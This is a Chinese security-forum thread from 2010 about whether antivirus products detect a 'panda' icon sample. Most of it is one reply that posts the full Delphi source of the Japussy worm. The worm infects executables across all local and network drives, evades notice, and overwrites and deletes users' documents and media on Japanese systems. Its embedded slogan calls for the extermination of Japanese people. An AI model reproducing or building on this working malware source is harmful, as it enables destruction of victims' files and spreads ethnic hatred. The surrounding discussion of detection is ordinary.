楼主: 轩、
收起左侧

[讨论] 小熊猫一只、、、貌似360对它有点安静了…

  [复制链接]
灰機
头像被屏蔽
发表于 2010-8-19 07:26:47 | 显示全部楼层
據說不是病毒。。。
灰機
头像被屏蔽
发表于 2010-8-19 07:28:59 | 显示全部楼层
這個據說。。咖啡沒有報毒,運行了貌似也沒什麼反映,就是explorer進程杯結束了然後又啟動了到底有沒有度毒哇,我實機試的
飞氘
发表于 2010-8-19 07:31:11 | 显示全部楼层
回复 9楼 leisong  的帖子


    你也有犯迷糊的时候。这个是修改注册表的一个键值,将所有可执行文件图标替换为熊猫而已,将其修改为%1就可以了。真是病毒放在国内区直接被KO了
chenpg
发表于 2010-8-19 08:33:21 | 显示全部楼层
本帖最后由 chenpg 于 2010.8.19 08:40 编辑
问leisong。现在卡饭很多用SD,好像是收费,不过卡饭嘛,收费都当免费用
jinzijie 发表于 2010.8.18 15:14



其实我挺喜欢SD的,可惜懒得折腾啊。。。
CYCSQ
发表于 2010-8-19 11:52:00 | 显示全部楼层
卡巴报有毒
猪头大队
头像被屏蔽
发表于 2010-8-19 11:53:29 | 显示全部楼层
這個據說。。咖啡沒有報毒,運行了貌似也沒什麼反映,就是explorer進程杯結束了然後又啟動了到底有沒 ...
灰機 发表于 2010.8.19 07:28

见10L OR 12L

追梦空间
发表于 2010-8-19 18:23:08 | 显示全部楼层
小a表示压力很大,没有反映,扫描不到
大金鱼先生
发表于 2010-8-19 20:43:30 | 显示全部楼层
熊猫烧香这么老的东东都不拦?360的“亿级云安全”干什么吃的?
Lgwu
头像被屏蔽
发表于 2010-8-19 21:19:39 | 显示全部楼层
熊猫烧香这么老的东东都不拦?360的“亿级云安全”干什么吃的?
jyc19970330 发表于 2010.8.19 20:43


是通过修改PE并附加病毒体还是直接修改文件关联默认图标,搞清楚再说吧。
给你份代码,在熊猫烧香之前很早就有的。怀疑熊猫烧香参考此代码而来。没啥技术含量:
  1. 熊猫烧香 - 核心源码   
  2. --------------------------------------------------------------------------------
  3. 僅供研究使用!後果自行負責

  4. 代码:--------------------------------------------------------------------------------
  5. 程序代码
  6. program Japussy;
  7. uses
  8.   Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
  9. const
  10.   HeaderSize = 82432;                  //病毒体的大小
  11.   IconOffset = $12EB8;                 //PE文件主图标的偏移量
  12.   
  13.   //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  14.   //查找2800000020的十六进制字符串可以找到主图标的偏移量
  15.    
  16. {
  17.   HeaderSize = 38912;                  //Upx压缩过病毒体的大小
  18.   IconOffset = $92BC;                  //Upx压缩过PE文件主图标的偏移量
  19.   
  20.   //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
  21. }
  22.   IconSize   = $2E8;                   //PE文件主图标的大小--744字节
  23.   IconTail   = IconOffset + IconSize;  //PE文件主图标的尾部
  24.   ID         = $44444444;              //感染标记
  25.   
  26.   //垃圾码,以备写入
  27.   Catchword = 'If a race need to be killed out, it must be Yamato. ' +
  28.               'If a country need to be destroyed, it must be Japan! ' +
  29.               '*** W32.Japussy.Worm.A ***';
  30. {$R *.RES}
  31. function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
  32.   stdcall; external 'Kernel32.dll'; //函数声明
  33. var
  34.   TmpFile: string;
  35.   Si:      STARTUPINFO;
  36.   Pi:      PROCESS_INFORMATION;
  37.   IsJap:   Boolean = False; //日文操作系统标记
  38. { 判断是否为Win9x }
  39. function IsWin9x: Boolean;
  40. var
  41.   Ver: TOSVersionInfo;
  42. begin
  43.   Result := False;
  44.   Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  45.   if not GetVersionEx(Ver) then
  46.     Exit;
  47.   if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  48.     Result := True;
  49. end;
  50. { 在流之间复制 }
  51. procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  52.   dStartPos: Integer; Count: Integer);
  53. var
  54.   sCurPos, dCurPos: Integer;
  55. begin
  56.   sCurPos := Src.Position;
  57.   dCurPos := Dst.Position;
  58.   Src.Seek(sStartPos, 0);
  59.   Dst.Seek(dStartPos, 0);
  60.   Dst.CopyFrom(Src, Count);
  61.   Src.Seek(sCurPos, 0);
  62.   Dst.Seek(dCurPos, 0);
  63. end;
  64. { 将宿主文件从已感染的PE文件中分离出来,以备使用 }
  65. procedure ExtractFile(FileName: string);
  66. var
  67.   sStream, dStream: TFileStream;
  68. begin
  69.   try
  70.     sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  71.     try
  72.       dStream := TFileStream.Create(FileName, fmCreate);
  73.       try
  74.         sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
  75.         dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
  76.       finally
  77.         dStream.Free;
  78.       end;
  79.     finally
  80.       sStream.Free;
  81.     end;
  82.   except
  83.   end;
  84. end;
  85. { 填充STARTUPINFO结构 }
  86. procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
  87. begin
  88.   Si.cb := SizeOf(Si);
  89.   Si.lpReserved := nil;
  90.   Si.lpDesktop := nil;
  91.   Si.lpTitle := nil;
  92.   Si.dwFlags := STARTF_USESHOWWINDOW;
  93.   Si.wShowWindow := State;
  94.   Si.cbReserved2 := 0;
  95.   Si.lpReserved2 := nil;
  96. end;
  97. { 发带毒邮件 }
  98. procedure SendMail;
  99. begin
  100.   //哪位仁兄愿意完成之?
  101. end;
  102. { 感染PE文件 }
  103. procedure InfectOneFile(FileName: string);
  104. var
  105.   HdrStream, SrcStream: TFileStream;
  106.   IcoStream, DstStream: TMemoryStream;
  107.   iID: LongInt;
  108.   aIcon: TIcon;
  109.   Infected, IsPE: Boolean;
  110.   i: Integer;
  111.   Buf: array[0..1] of Char;
  112. begin
  113.   try //出错则文件正在被使用,退出
  114.     if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
  115.       Exit;
  116.     Infected := False;
  117.     IsPE     := False;
  118.     SrcStream := TFileStream.Create(FileName, fmOpenRead);
  119.     try
  120.       for i := 0 to $108 do //检查PE文件头
  121.       begin
  122.         SrcStream.Seek(i, soFromBeginning);
  123.         SrcStream.Read(Buf, 2);
  124.         if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
  125.         begin
  126.           IsPE := True; //是PE文件
  127.           Break;
  128.         end;
  129.       end;
  130.       SrcStream.Seek(-4, soFromEnd); //检查感染标记
  131.       SrcStream.Read(iID, 4);
  132.       if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
  133.         Infected := True;
  134.     finally
  135.       SrcStream.Free;
  136.     end;
  137.     if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
  138.       Exit;
  139.     IcoStream := TMemoryStream.Create;
  140.     DstStream := TMemoryStream.Create;
  141.     try
  142.       aIcon := TIcon.Create;
  143.       try
  144.         //得到被感染文件的主图标(744字节),存入流
  145.         aIcon.ReleaseHandle;
  146.         aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
  147.         aIcon.SaveToStream(IcoStream);
  148.       finally
  149.         aIcon.Free;
  150.       end;
  151.       SrcStream := TFileStream.Create(FileName, fmOpenRead);
  152.       //头文件
  153.       HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  154.       try
  155.         //写入病毒体主图标之前的数据
  156.         CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
  157.         //写入目前程序的主图标
  158.         CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
  159.         //写入病毒体主图标到病毒体尾部之间的数据
  160.         CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
  161.         //写入宿主程序
  162.         CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
  163.         //写入已感染的标记
  164.         DstStream.Seek(0, 2);
  165.         iID := $44444444;
  166.         DstStream.Write(iID, 4);
  167.       finally
  168.         HdrStream.Free;
  169.       end;
  170.     finally
  171.       SrcStream.Free;
  172.       IcoStream.Free;
  173.       DstStream.SaveToFile(FileName); //替换宿主文件
  174.       DstStream.Free;
  175.     end;
  176.   except;
  177.   end;
  178. end;

  179. { 将目标文件写入垃圾码后删除 }
  180. procedure SmashFile(FileName: string);
  181. var
  182.   FileHandle: Integer;
  183.   i, Size, Mass, Max, Len: Integer;
  184. begin
  185.   try
  186.     SetFileAttributes(PChar(FileName), 0); //去掉只读属性
  187.     FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
  188.     try
  189.       Size := GetFileSize(FileHandle, nil); //文件大小
  190.       i := 0;
  191.       Randomize;
  192.       Max := Random(15); //写入垃圾码的随机次数
  193.       if Max < 5 then
  194.         Max := 5;
  195.       Mass := Size div Max; //每个间隔块的大小
  196.       Len := Length(Catchword);
  197.       while i < Max do
  198.       begin
  199.         FileSeek(FileHandle, i * Mass, 0); //定位
  200.         //写入垃圾码,将文件彻底破坏掉
  201.         FileWrite(FileHandle, Catchword, Len);
  202.         Inc(i);
  203.       end;
  204.     finally
  205.       FileClose(FileHandle); //关闭文件
  206.     end;
  207.     DeleteFile(PChar(FileName)); //删除之
  208.   except
  209.   end;
  210. end;
  211. { 获得可写的驱动器列表 }
  212. function GetDrives: string;
  213. var
  214.   DiskType: Word;
  215.   D: Char;
  216.   Str: string;
  217.   i: Integer;
  218. begin
  219.   for i := 0 to 25 do //遍历26个字母
  220.   begin
  221.     D := Chr(i + 65);
  222.     Str := D + ':';
  223.     DiskType := GetDriveType(PChar(Str));
  224.     //得到本地磁盘和网络盘
  225.     if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  226.       Result := Result + D;
  227.   end;
  228. end;
  229. { 遍历目录,感染和摧毁文件 }
  230. procedure LoopFiles(Path, Mask: string);
  231. var
  232.   i, Count: Integer;
  233.   Fn, Ext: string;
  234.   SubDir: TStrings;
  235.   SearchRec: TSearchRec;
  236.   Msg: TMsg;
  237.   function IsValidDir(SearchRec: TSearchRec): Integer;
  238.   begin
  239.     if (SearchRec.Attr <> 16) and  (SearchRec.Name <> '.') and
  240.       (SearchRec.Name <> '..') then
  241.       Result := 0 //不是目录
  242.     else if (SearchRec.Attr = 16) and  (SearchRec.Name <> '.') and
  243.       (SearchRec.Name <> '..') then
  244.         Result := 1 //不是根目录
  245.     else Result := 2; //是根目录
  246.   end;
  247. begin
  248.   if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
  249.   begin
  250.     repeat
  251.       PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
  252.       if IsValidDir(SearchRec) = 0 then
  253.       begin
  254.         Fn := Path + SearchRec.Name;
  255.         Ext := UpperCase(ExtractFileExt(Fn));
  256.         if (Ext = '.EXE') or (Ext = '.SCR') then
  257.         begin
  258.           InfectOneFile(Fn); //感染可执行文件        
  259.         end
  260.         else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
  261.         begin
  262.           //感染HTML和ASP文件,将Base64编码后的病毒写入
  263.           //感染浏览此网页的所有用户
  264.           //哪位大兄弟愿意完成之?
  265.         end
  266.         else if Ext = '.WAB' then //Outlook地址簿文件
  267.         begin
  268.           //获取Outlook邮件地址
  269.         end
  270.         else if Ext = '.ADC' then //Foxmail地址自动完成文件
  271.         begin
  272.           //获取Foxmail邮件地址
  273.         end
  274.         else if Ext = 'IND' then //Foxmail地址簿文件
  275.         begin
  276.           //获取Foxmail邮件地址
  277.         end
  278.         else
  279.         begin
  280.           if IsJap then //是倭文操作系统
  281.           begin
  282.             if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
  283.               (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
  284.               (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
  285.               (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
  286.               (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
  287.               (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
  288.                 SmashFile(Fn); //摧毁文件
  289.           end;
  290.         end;
  291.       end;
  292.       //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  293.       Sleep(200);
  294.     until (FindNext(SearchRec) <> 0);
  295.   end;
  296.   FindClose(SearchRec);
  297.   SubDir := TStringList.Create;
  298.   if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
  299.   begin
  300.     repeat
  301.       if IsValidDir(SearchRec) = 1 then
  302.         SubDir.Add(SearchRec.Name);
  303.     until (FindNext(SearchRec) <> 0);
  304.     end;
  305.   FindClose(SearchRec);
  306.   Count := SubDir.Count - 1;
  307.   for i := 0 to Count do
  308.     LoopFiles(Path + SubDir.Strings[i] + '', Mask);
  309.   FreeAndNil(SubDir);
  310. end;
  311. { 遍历磁盘上所有的文件 }
  312. procedure InfectFiles;

  313. var
  314.   DriverList: string;
  315.   i, Len: Integer;
  316. begin
  317.   if GetACP = 932 then //日文操作系统
  318.     IsJap := True; //去死吧!
  319.   DriverList := GetDrives; //得到可写的磁盘列表
  320.   Len := Length(DriverList);
  321.   while True do //死循环
  322.   begin
  323.     for i := Len downto 1 do //遍历每个磁盘驱动器
  324.       LoopFiles(DriverList[i] + ':', '*.*'); //感染之
  325.     SendMail; //发带毒邮件
  326.     Sleep(1000 * 60 * 5); //睡眠5分钟
  327.   end;
  328. end;
  329. { 主程序开始 }
  330. begin
  331.   if IsWin9x then //是Win9x
  332.     RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
  333.   else //WinNT
  334.   begin
  335.     //远程线程映射到Explorer进程
  336.     //哪位兄台愿意完成之?
  337.   end;
  338.   //如果是原始病毒体自己
  339.   if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
  340.     InfectFiles //感染和发邮件
  341.   else //已寄生于宿主程序上了,开始工作
  342.   begin
  343.     TmpFile := ParamStr(0); //创建临时文件
  344.     Delete(TmpFile, Length(TmpFile) - 4, 4);
  345.     TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
  346.     ExtractFile(TmpFile); //分离之
  347.     FillStartupInfo(Si, SW_SHOWDEFAULT);
  348.     CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  349.       0, nil, '.', Si, Pi); //创建新进程运行之
  350.     InfectFiles; //感染和发邮件
  351.   end;
  352. end.

  353. ~~~~~~~~~~~~~~~~~~~~~~~~
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-6-2 20:30 , Processed in 0.095842 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表